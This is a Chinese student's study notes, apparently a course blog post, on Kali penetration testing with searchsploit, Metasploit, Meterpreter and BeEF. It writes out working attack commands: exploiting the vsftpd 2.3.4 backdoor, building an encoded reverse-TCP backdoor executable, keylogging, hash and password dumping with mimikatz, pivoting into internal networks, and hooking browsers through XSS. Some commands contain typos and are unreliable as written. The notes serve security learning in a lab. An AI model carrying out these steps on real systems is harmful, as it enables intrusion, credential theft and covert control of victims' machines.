• 《网络攻防》- 学习心得


    kali视频(26-30)学习

    KaliSecurity 漏洞利用之检索与利用

    searchsploit可以借助关键词搜索漏洞信息以及漏洞对应的exp【重要】
    exploit-database在github上面有对应的地址
    国内可以在“乌云”“cbug”上搜索相关的漏洞信息

    searchsploit wordpress列出了漏洞和文件地址。
    查看列出的文件,例:ikat自动化开启不同的exp,等待目标访问中招。

    termineter可以评估智能电表的安全性
    KaliSecurity 漏洞利用之Metasploit基础【非常重要】
    Metasploit在渗透测试中经常被用到。这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。

    启动服务:
    在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以利用msf数据库查询exploit和记录。

    service postgresql start
    service matasploit start
    //或者可以随着配置随着系统启动
    update-rc.d postgresql enable 
    update-rc.d matasploit enable
    

    路径介绍
    Kali中msf的路径为/usr/share/metasploit-framework。
    其中:
    Auxiliary:辅助模块

    encoders:供msfencode编码工具使用,具体可以使用 msfencode –l但显示命令不存在。

    exploits:攻击模块 每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录下。

    payloads:其中列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

    post:后渗透阶段块,在获得meterpreter的shell之后可以使用攻击代码。比如常用的hashdump、arp_scanner就在这里。

    基本命令
    msfpayload:用来生成payload或者shellcode。
    搜索时可以用msfpayload -l |gre[ "windows"这样的命令查询。-o选项可以列出payload所需的参数。

    msfencode:msf中的编码器,早期用来绕过AV(杀毒软件),现常用msfpayload与它编码避免exploit的坏字符串。

    msfconsole:开启metasploit的console。
    输入msfconsole,打开msf。

    测试示例:发现漏洞,搜索exploit,可以看到21端口开放的是ftp服务,用的版本是ftpd 5.0。
    此版本是否存在漏洞,在msf里搜索一下,发现有匹配项,然后攻击之后成功。

    nmap -sV 172.30.2.73//发现开启了一个vsftpd 21端口的一个2.3.4的一个服务
    maf> search vsftp//看看vsfpd是否有漏洞 发现正好有一个漏洞
    msf> use exploit/unix/ftp/vsptpd_234_backdoor//进入
    msf>show options//看到需要配置的参数
    msf>set rhost 192.168.11.225//选择要搞得远程地址
    msf>set payload cmd/unix/interact//之后还要配置payload,就是执行成功之后进行的代码
    exploit//进行对目标进行攻击
    成功之后就可以进行查看,比如:
    id	woami	cat/etc/passwd	cat /etc/shadow
    等等
    

    KaliSecurity 漏洞利用之Meterpreter介绍

    【很重要】【成了之后控制靶机的东西

    生成Meterpreter后门
    打开MSF,开启监听(选择exploit/multi/handler)。

    msfpayload windows/meterpreter/reverse_tcp LHOST=172.30.2.73 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe
    

    在指定目录,生成exe后门。

    msf>use exploit/multi/handler //选择使用这个接受反弹连接
    msf>show options//显示所有东西 
    msf>set payload windows/meterpreter/reverse_tcp
    set Lport 2333
    set Lhost 172.16.215.182//监听本地的2333端口等待返回的payload
    background//进行查看当前状态
    seddions -i 1 //回到msf中
    sysinfo//查看系统信息
    hashdump//获取hash等等
    screenshot//获取屏幕
    keyscan_start//记录键盘
    keyscan_dump//得到从记录开始的键盘状态
    keyscan_stop//就能关闭这款服务
    load+tab//得到扩展工具
    比如:mimikatz抓取明文,load之后加上help就能看到明文
    wdigest就能够获取密码明文
    

    更新的kali,现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode,然后将door植到对方主机

    KaliSecurity 漏洞利用之Metasploit后渗透测试【使用Msf获得后门后,获得内网主机权限】

    在跳板获取一定权限后,需要积极地向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的Meterpreter后门,可以使

    后续的操作更容易。

    查看当前网卡、网段信息(使用ifconfig)。可查看到三个网卡,一个是本地网卡,另一个是我们能访问的网卡,还有一个网卡具有内网IP访问不到,可以ping以下试试)。

    添加路由表

    run autoroute -s 10.0.0.1
    

    可以使用msf中的模块跨网段攻击或扫描。可通过脚本autoroute快速添加。
    开socket代理,通过使用

    search socks 
    use auxiliary/server/socks4a
    show options//查找现在的状态
    exploit//建立一个代理
    run//之后后续有两百多个命令
    run arp_scanner -h 10.0.0.1/24//扫描内网信息
    

    模块,创建一个socks代理,可以为浏览器,sqlmap,nmap使用。通过代理即可访问内网计算机。
    通过background和session -i可以自由切换进入session。
    输入run可以看到在meterpreter上可以做的很多命令。
    通过run post/可以看到后渗透测试模块。
    获取内网信息
    也可以上传文件,做端口转发后进行后续测试,例

    upload lcx.exe c:
    

    传送文件到c盘根目录。
    KaliSecurity 漏洞利用之BeEF【重要】
    一个浏览器漏洞利用框架

    在命令行下启动BeeF,beef-xss。

    假设被测试主机由于XSS漏洞请求到http://127.0.0.1:3000/demos/basic.html,此时页面左侧就会多出一项在线主机:

    hook持续的时间为关闭测试页面为止,在此期间,相当于被控制了,可以发送攻击命令,在commands模块,我们可以完成很多任务:
    其中四种颜色分别表示:

    该攻击模块可用,且隐蔽性强
    该攻击模块可用,但隐蔽性差
    该用户模块是否可用还有待验证
    该攻击模块不可用
    

    选取misc下的raw javascript模块作为测试用例,右端表格有该模块的详细说明,以及一些可选的参数等。输入javascript code,点击excute进

    行攻击。在此,输入的是hello world,返回成功!

    Proxy功能(代理功能)

    选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。

    BeeF默认是不加载Metasploit的,如果要使用Metasploit丰富的攻击模块,需要做些配置。
    首先打开beef xss目录:

    cd /usr/share/beef-xss/
    ls
    nano config.yaml  /*编辑一下,可以看到有很多配置信息,包括用户名、密码都可以在这设置,在此将extension下的Metasploit的false修
    

    改为true */
    clear

    保证此处IP等信息设置正确(不适用127.0.0.1,需使用本机IP),并修改Custom路径:

    cd extensions/metasploit/
    ls
    nano config.yaml  
    /* 将host和callback_host行的IP修改为本机IP,并修改custom路径为/usr/share/metasploit-framework/ */
    

    配置好后打开msfconsole,运行命令:

    load msgrpc ServerHost=192.168.199.198 Pass=abc123
    cd /usr/share/beef-xss
    ./beef -x//重新加载Metasploit的exploit模块。加载之后,重启下服务
    service beef-xss restart。
    

    此时再访问以下之前的页面,发现无法连接,稍等片刻,使用默认用户密码登录进去。发现Metasploit下多了许多模块:

  • 相关阅读:
    JVM虚拟机
    antd Table排序问题
    关于element-ui中el-container布满全局的问题!
    vue 安装css预处理器LESS
    mybatis官网
    Lombok安装及使用介绍
    thymeleaf中th:each的使用,遍历数组
    thymeleaf中th:text和th:utext的使用与区别
    SprongBoot项目的打包与启动
    SpringBoot简单学习
  • 原文地址:https://www.cnblogs.com/zhangyuxiang666/p/10708050.html
Copyright © 2020-2023  润新知